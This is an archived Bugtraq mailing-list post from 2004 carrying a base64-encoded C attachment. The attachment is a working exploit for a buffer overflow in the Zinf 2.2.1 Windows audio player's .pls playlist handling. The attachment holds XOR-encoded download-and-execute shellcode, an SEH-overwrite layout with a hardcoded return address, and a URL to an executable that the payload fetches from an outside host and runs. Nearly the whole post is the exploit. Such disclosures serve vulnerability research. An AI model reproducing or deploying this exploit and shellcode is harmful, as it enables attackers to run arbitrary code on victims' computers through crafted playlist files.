[36747] in bugtraq
Re: Buffer overflow in Zinf 2.2.1 for Win32+exploit
daemon@ATHENA.MIT.EDU (iggy popal)
Wed Sep 29 16:22:35 2004
Date: Mon, 27 Sep 2004 19:34:19 +0200
From: iggy popal <me@delikon.de>
Reply-To: iggy popal <me@delikon.de>
Message-ID: <34131750.20040927193419@delikon.de>
To: bugtraq@securityfocus.com
In-Reply-To: <20040924213102.7fb91138.aluigi@autistici.org>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------D14F1571C5333F9"
------------D14F1571C5333F9
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
this exploit creates a file eploit.pls, which downloads+executes a file.
keep up you good work, luigi!
best regards, delikon
------------D14F1571C5333F9
Content-Type: text/plain; name="zinfexploit.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="zinfexploit.c"
LyoNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1BZHZpc29yeS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0NCkx1aWdpIEF1cmllbW1hIDxhbHVpZ2koYWFhYXR0dHR0dClh
dXRpc3RpY2lbRDAwMHRdb3JnPg0KDQpJIGRvbid0IGtub3cgd2h5IHRoaXMgYnVnIGhhcyBub3Qg
YmVlbiB0cmFja2VkIGJ1dCBtb3Jlb3ZlciBJIGRvbid0DQpjb21wbGV0ZWx5IGtub3cgd2h5IGl0
IGhhcyBub3QgYmVlbiBmaXhlZCB5ZXQgaW4gdGhlIFdpbmRvd3MgdmVyc2lvbiBvZg0KWmluZi4N
Cg0KSW4gc2hvcnQsIFppbmYgaXMgYW4gYXVkaW8gcGxheWVyIGZvciBMaW51eCBhbmQgV2luZG93
czogaHR0cDovL3d3dy56aW5mLm9yZw0KVGhlIGxhdGVzdCBMaW51eCB2ZXJzaW9uIGlzIDIuMi41
IHdoaWxlIHRoZSBsYXRlc3QgV2luZG93cyB2ZXJzaW9uIGlzIDIuMi4xDQp3aGljaCBpcyBzdGls
bCB2dWxuZXJhYmxlIHRvIGEgYnVmZmVyLW92ZXJmbG93IGJ1ZyBpbiB0aGUgbWFuYWdlbWVudCBv
ZiB0aGUNCnBsYXlsaXN0IGZpbGVzICIucGxzIi4NCg0KVGhpcyBidWcgaGFzIGJlZW4gZm91bmQg
YW5kIGZpeGVkIGJ5IHRoZSBzYW1lIGRldmVsb3BlcnMgaW4gdGhlIHJlY2VudA0KdmVyc2lvbnMg
Zm9yIExpbnV4IGJ1dCwgYXMgYWxyZWFkeSBzYWlkLCB0aGUgdnVsbmVyYWJsZSBXaW5kb3dzIHZl
cnNpb24gaXMNCnN0aWxsIGRvd25sb2FkYWJsZSBhbmQgY2FuIGJlIGV4cGxvaXRlZCBsb2NhbGx5
IGFuZCByZW1vdGVseSB0aHJvdWdoIHRoZSB3ZWINCmJyb3dzZXIgYW5kIGEgbWFsaWNpb3VzIHBs
cyBmaWxlLg0KDQpBIHNpbXBsZSBwcm9vZi1vZi1jb25jZXB0IHRvIHRlc3QgdGhlIGJ1ZyBpcyBh
dmFpbGFibGUgaGVyZToNCg0KICBodHRwOi8vYWx1aWdpLmFsdGVydmlzdGEub3JnL3BvYy96aW5m
LWJvZi5wbHMNCg0KVGhhdCdzIGFsbCwganVzdCB0byBrZWVwIHRyYWNrIG9mIHRoaXMgYnVnIGFu
ZCB0byB3YXJuIHdobyB1c2VzIHRoZSBXaW5kb3dzDQp2ZXJzaW9uLg0KDQoNCkJZRVoNCi0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tDQpoZXkgTHVpZ2kgaG93IG11Y2ggQWR2aXNvcmllcyBkbyB5b3UgcmVsZWFz
ZSBldmVyeSBtb250aD8/bWF5YmUgMzAgOyk/Pw0Kc29tZXRpbWVzIGkgdGhpbmsgeW91ciBkYXkg
aGFzIDQ4IGhvdXJzIDspDQoNCmJlc3QgcmVnYXJkcw0KDQoNCg0KLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KdGhpcyBleHBsb2l0IGdlbmVyYXRlcyBhIGZpbGUgZXhwbG9pdC5wbHMgd2hpY2ggb3ZlcmZs
b3dzIGEgc2VoIGhhbmRsZXINCmp1bXBzIGludG8gYSBzZXJ2aWNlIHBhY2sgaW5kZXBlbmRlbnQg
YWRkcmVzcyB0aGVuIGl0IGRvd25sb2FkcyBhbmQgZXhlY3V0ZXMgYSBmaWxlDQoNCg0KICB5b3Ug
Y2FuIGFsc28gZG93bmxvYWQgdGhpcyBleHBsb2l0IGkgYSByYXIgZmlsZSh3d3cuZGVsaWtvbi5k
ZSkuDQogIGluIHRoaXMgcmFyIGZpbGUgeW91IHdpbGwgZmluZCBzb21lIHNjcmVlbnNob3RzLCBm
cm9tIE9sbHlEYmcgDQogIHdoaWNoIGlzIG1heWJlIHVzZWZ1bCBmb3IgYmVnaW5uZXJzDQoNCg0K
Ki8NCg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8d2luZG93cy5oPg0KDQojZGVmaW5l
IFNJWkUgNDA0OA0KDQoNCmNoYXIgc2hlbGxjb2RlW10gPSAiXHhFQiIvL3hvcmVkIHdpdGggMHgx
ZA0KIlx4MTBceDU4XHgzMVx4QzlceDY2XHg4MVx4RTlceDIyXHhGRlx4ODBceDMwXHgxRFx4NDBc
eEUyXHhGQVx4RUJceDA1XHhFOFx4RUJceEZGIg0KIlx4RkZceEZGXHhGNFx4RDFceDFEXHgxRFx4
MURceDQyXHhGNVx4NEJceDFEXHgxRFx4MURceDk0XHhERVx4NERceDc1XHg5M1x4NTNceDEzIg0K
Ilx4RjFceEY1XHg3RFx4MURceDFEXHgxRFx4MkNceEQ0XHg3Qlx4QTRceDcyXHg3M1x4NENceDc1
XHg2OFx4NkZceDcxXHg3MFx4NDlceEUyIg0KIlx4Q0RceDREXHg3NVx4MkJceDA3XHgzMlx4NkRc
eEY1XHg1Qlx4MURceDFEXHgxRFx4MkNceEQ0XHg0Q1x4NENceDkwXHgyQVx4NEJceDkwIg0KIlx4
NkFceDE1XHg0Qlx4NENceEUyXHhDRFx4NEVceDc1XHg4NVx4RTNceDk3XHgxM1x4RjVceDMwXHgx
RFx4MURceDFEXHg0Q1x4NEFceEUyIg0KIlx4Q0RceDJDXHhENFx4NTRceEZGXHhFM1x4NEVceDc1
XHg2M1x4QzVceEZGXHg2RVx4RjVceDA0XHgxRFx4MURceDFEXHhFMlx4Q0RceDQ4Ig0KIlx4NEJc
eDc5XHhCQ1x4MkRceDFEXHgxRFx4MURceDk2XHg1RFx4MTFceDk2XHg2RFx4MDFceEIwXHg5Nlx4
NzVceDE1XHg5NFx4RjVceDQzIg0KIlx4NDBceERFXHg0RVx4NDhceDRCXHg0QVx4OTZceDcxXHgz
OVx4MDVceDk2XHg1OFx4MjFceDk2XHg0OVx4MThceDY1XHgxQ1x4RjdceDk2Ig0KIlx4NTdceDA1
XHg5Nlx4NDdceDNEXHgxQ1x4RjZceEZFXHgyOFx4NTRceDk2XHgyOVx4OTZceDFDXHhGM1x4MkNc
eEUyXHhFMVx4MkNceEREIg0KIlx4QjFceDI1XHhGRFx4NjlceDFBXHhEQ1x4RDJceDEwXHgxQ1x4
REFceEY2XHhFRlx4MjZceDYxXHgzOVx4MDlceDY4XHhGQ1x4OTZceDQ3Ig0KIlx4MzlceDFDXHhG
Nlx4N0JceDk2XHgxMVx4NTZceDk2XHg0N1x4MDFceDFDXHhGNlx4OTZceDE5XHg5Nlx4MUNceEY1
XHhGNFx4MUZceDFEIg0KIlx4MURceDFEXHgyQ1x4RERceDk0XHhGN1x4NDJceDQzXHg0MFx4NDZc
eERFXHhGNVx4MzJceEUyXHhFMlx4RTJceDcwXHg3NVx4NzVceDMzIg0KIlx4NzhceDY1XHg3OFx4
MUQiOw0KDQoNCg0KDQoNCg0KDQppbnQgbWFpbigpew0KDQpjaGFyIGJ1ZmZlcltTSVpFXTsNCmNo
YXIgZXhwbG9pdFtdPSJleHBsb2l0LnBscyI7DQpjaGFyIGhlYWRbXT0iW3BsYXlsaXN0XUZpbGUx
PSI7DQppbnQgaT0wOw0KVUxPTkcgYnl0ZXM9MDsNCmNoYXIgKnBvaW50ZXI9TlVMTDsNCi8vZm9y
IHRoZSBkZWNvZGVyDQpzaG9ydCBpbnQgd2VibGVuZ3RoPTB4ZmYyMjsNCg0KDQpVTE9ORyBSZXRB
ZGRyPTB4MTA0MDREQzQ7DQovKg0KU0VSVklDRSBQQUNLIGluZGVwZW5kZW50DQpodHRwaW5wdXQu
cG1pDQoxMDQwNERDNCAgICA1RCAgICAgICAgICAgICAgUE9QIEVCUA0KMTA0MDREQzUgICAgQjgg
MTgwMDAwMDAgICAgIE1PViBFQVgsMTgNCjEwNDA0RENBICAgIDVCICAgICAgICAgICAgICBQT1Ag
RUJYDQoxMDQwNERDQiAgICBDMiAwODAwICAgICAgICAgUkVUTiA4DQoqLw0KLy9qdW1wIGludG8g
bm9wcw0KRFdPUkQganVtcD0weDkwOTAyNWViOw0KSEFORExFIGZpbGU9TlVMTDsNCg0KLy90aGlz
IGlzIGEgc21hbGwgbWVzc2FnZUJveCBhcHANCmNoYXIgd2ViW109Imh0dHA6Ly93d3cuZGVsaWtv
bi5kZS9rbGVpbi5leGUiOw0KDQoNCnByaW50ZigiQSBCdWZmZXIgb3ZlcmZsb3cgZXhwbG9pdCBh
Z2FpbnN0IFppbmYgMi4yLjEgZm9yIFdpbjMyXG4iKTsNCnByaW50ZigiQ29kZWQgYnkgRGVsaWtv
bnx3d3cuZGVsaWtvbi5kZXwyNy45LjA0XG4iKTsNCnByaW50ZigiYWxsIGNyZWRpdHMgZ29lcyB0
byBMdWlnaSBBdXJpZW1tYVxuIik7DQpwcmludGYoIlxuIFsrXSBnZW5lcmF0ZSBleHBsb2l0LnBs
c1xuIik7DQoNCg0KDQptZW1zZXQoYnVmZmVyLDB4MDAsU0laRS0xKTsNCg0KDQogZmlsZSA9IENy
ZWF0ZUZpbGUoZXhwbG9pdCwgR0VORVJJQ19XUklURSwwLE5VTEwsQ1JFQVRFX0FMV0FZUyxGSUxF
X0FUVFJJQlVURV9BUkNISVZFLE5VTEwpOw0KDQppZihmaWxlID09IChIQU5ETEUpMHhmZmZmZmZm
Zil7DQoNCglwcmludGYoIlx0WytdIGVycm9yIG9wZW5pbmcgdGhlIGZpbGVcbiIpOw0KCXByaW50
ZigiUFJFU1MgQSBLRVlcbiIpOw0KCWdldGNoYXIoKTsNCglyZXR1cm4gLTE7DQoNCn0JDQoJc3Ry
Y3B5KGJ1ZmZlcixoZWFkKTsNCgkNCgltZW1zZXQoYnVmZmVyK3N0cmxlbihidWZmZXIpLDB4NjEs
MTcpOw0KCS8vbm9wcw0KCW1lbXNldChidWZmZXIrc3RybGVuKGJ1ZmZlciksMHg5MCwyMCk7DQoJ
Ly8NCglzdHJjYXQoYnVmZmVyLHNoZWxsY29kZSk7DQoJLy9zZWFyY2ggZm9yIHRoZSBzaGVsbGNv
ZGUgbGVuZ3RoDQoJcG9pbnRlcj1zdHJzdHIoYnVmZmVyLCJceDIyXHhmZiIpOw0KCS8vd2VibGVu
Z3RoWzBdLT1zdHJsZW4od2ViKSsxOw0KCXdlYmxlbmd0aC09c3RybGVuKHdlYikrMTsNCgkvL2lu
Y3JlYXNlIGl0DQoJbWVtY3B5KHBvaW50ZXIsJndlYmxlbmd0aCwyKTsNCgkNCg0KCS8vY29weSB0
aGUgdXJsIGluIHRoZSBidWZmZXINCglzdHJjYXQoYnVmZmVyLHdlYik7DQoNCg0KCS8veG9yIHRo
ZSB1cmwgd2l0aCAweDFkDQoJd2hpbGUoKihidWZmZXIrc3RybGVuKGJ1ZmZlciktc3RybGVuKHdl
YikraSkpew0KDQoJDQoJCSooYnVmZmVyK3N0cmxlbihidWZmZXIpLXN0cmxlbih3ZWIpK2kpPSoo
YnVmZmVyK3N0cmxlbihidWZmZXIpLXN0cmxlbih3ZWIpK2kpXjB4MWQ7DQoJCWkrKzsNCgl9DQoJ
DQoJKihidWZmZXIrc3RybGVuKGJ1ZmZlciktc3RybGVuKHdlYikraSk9MHgxZDsNCg0KCS8vY29w
eSB0aGUgZmlsbGluZw0KCW1lbXNldChidWZmZXIrc3RybGVuKGJ1ZmZlciksMHg2MSw1MTctc3Ry
bGVuKGJ1ZmZlcikpOw0KCS8vYWxzbyBmaWxsaW5nIDspDQoJbWVtY3B5KGJ1ZmZlcitzdHJsZW4o
YnVmZmVyKSwmUmV0QWRkciw0KTsNCgkNCgltZW1zZXQoYnVmZmVyK3N0cmxlbihidWZmZXIpLDB4
NDEsNCk7DQoJbWVtc2V0KGJ1ZmZlcitzdHJsZW4oYnVmZmVyKSwweDQyLDQpOw0KCQkNCgkvL2p1
bXAgMjQgYnl0ZXMgZm9yd2FyZA0KCW1lbWNweShidWZmZXIrc3RybGVuKGJ1ZmZlciksJmp1bXAs
NCk7DQoJLy9qdW1wIGludG8gcG9wIHJlZyBwb3AgcmVnIHJldA0KCW1lbWNweShidWZmZXIrc3Ry
bGVuKGJ1ZmZlciksJlJldEFkZHIsNCk7DQoJbWVtc2V0KGJ1ZmZlcitzdHJsZW4oYnVmZmVyKSww
eDQ1LDQpOw0KCW1lbXNldChidWZmZXIrc3RybGVuKGJ1ZmZlciksMHg0Niw0KTsNCgltZW1zZXQo
YnVmZmVyK3N0cmxlbihidWZmZXIpLDB4NDcsNCk7DQoJDQoJDQoNCglXcml0ZUZpbGUoZmlsZSxi
dWZmZXIsc3RybGVuKGJ1ZmZlciksJmJ5dGVzLDApOw0KDQoJQ2xvc2VIYW5kbGUoZmlsZSk7DQoJ
cHJpbnRmKCJcbiBbK10gcmVhZHkgcHJlc3MgYSBrZXlcbiIpOw0KCWdldGNoYXIoKTsNCg0KDQoJ
ZXhpdCgxKTsNCg0KCQ0KfQ==
------------D14F1571C5333F9--
